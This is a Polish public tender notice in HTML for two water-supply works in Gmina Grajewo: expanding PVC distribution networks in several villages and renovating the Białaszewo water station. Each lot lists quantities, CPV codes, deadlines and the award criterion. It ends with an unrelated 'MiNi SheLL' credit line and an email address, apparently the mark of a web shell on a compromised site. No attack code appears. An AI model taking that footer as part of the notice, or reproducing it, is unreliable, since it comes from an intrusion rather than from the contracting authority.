<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1. Rozbudowa sieci wodociągowej na terenie Gminy Grajewo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> * sieć rozdzielcza z PVC Danówek
       - roboty ziemne sieć fi 110 mm
       - roboty montażowe sieć fi 110 mm - 252m
       - roboty ziemne sieć fi 40 mm
       - roboty budowlano-montażowe fi 40 mm - 31m
      * sieć rozdzielcza z PVC Sojczyn Borowy
       - roboty ziemne
       - roboty montażowe sieć fi 110 mmm - 1033,5 m
      * sieć rozdzielcza z PVC Toczyłowo
       - roboty geodezyjne
       - roboty ziemne
       - roboty budowlano- montażowe sieć fi 110 mm - 2174 m
       - inne roboty
      * sieć rozdzielcza z PVC Modzelówka cz. II
       - roboty ziemne
       - roboty montażowe sieć fi 90 mm - 161,5 m
      * siec rozdzielcza z PVC Modzelówka cz. I
      - roboty ziemne
      - roboty budowlano- montażowe sieć fi 110 mm - 560 m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2. Remont stacji wodociągowej w m. Białaszewo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:
- zgłoszenie do właściwego UDT prac remontowych
- sporządzenie projektu określającego zakres naprawy urządzeń zatwierdzonego 
  przez UDT
- oczyszczenie, malowanie aeratora ciśnieniowego do napowietrzania uzdatnianej 
  wody,
- wymiana dysz napowietrzających w aeratorze,
- wymiana odpowietrzników kulowych na odpowietrzniki pływakowe na aeratorze
- wymiana sprężarki dostarczającej powietrze do aeratora ciśnieniowego,
- wykonanie przeglądu i przygotowanie zbiornika sprężonego powietrza do rewizji,
- oczyszczenie i malowanie powierzchni wewnętrznej filtra pospiesznego i zbiornika
   hydroforowego,
- wymiana drenażu filtra pospiesznego,
- montaż systemu rozprowadzającego powietrze do;
- do płukania filtra pospiesznego,
- do uzupełniania poduszki powietrznej w hydroforze
- do procesu uzdatniania
- montaż armatury odcinającej i kontrolno-pomiarowej ułatwiającej kontrolę procesów 
  uzdatniania wody,
- wymiana złoża filtracyjnego,
- rozruch stacji po wykonaniu remontu.
- uzyskanie decyzji UDT o dopuszczeniu do eksploatacji po wykonanym remoncie
- zakup i podłączenie agregatu prądotwórczego samojezdnego o mocy 60 KVA

Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych materiałów i urządzeń niż podane w dokumentacji projektowej pod warunkiem zapewnienia parametrów nie gorszych niż określone w Dokumentacji zamówienia. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów uwiarygodniających te materiały i urządzenia.
Powyższy zakres ujęty został w następujących elementach: 
      -  roboty wstępne
      - mieszacz wodno-powietrzny
      - hydrofiltr
      - hydrofor
      - badanie + podłączenie sieci
      - zakup i podłączenie agregatu prądotwórczego samojezdnego o mocy 60 kVA.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.30-5, 45.30.00.00-0, 45.25.21.26-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com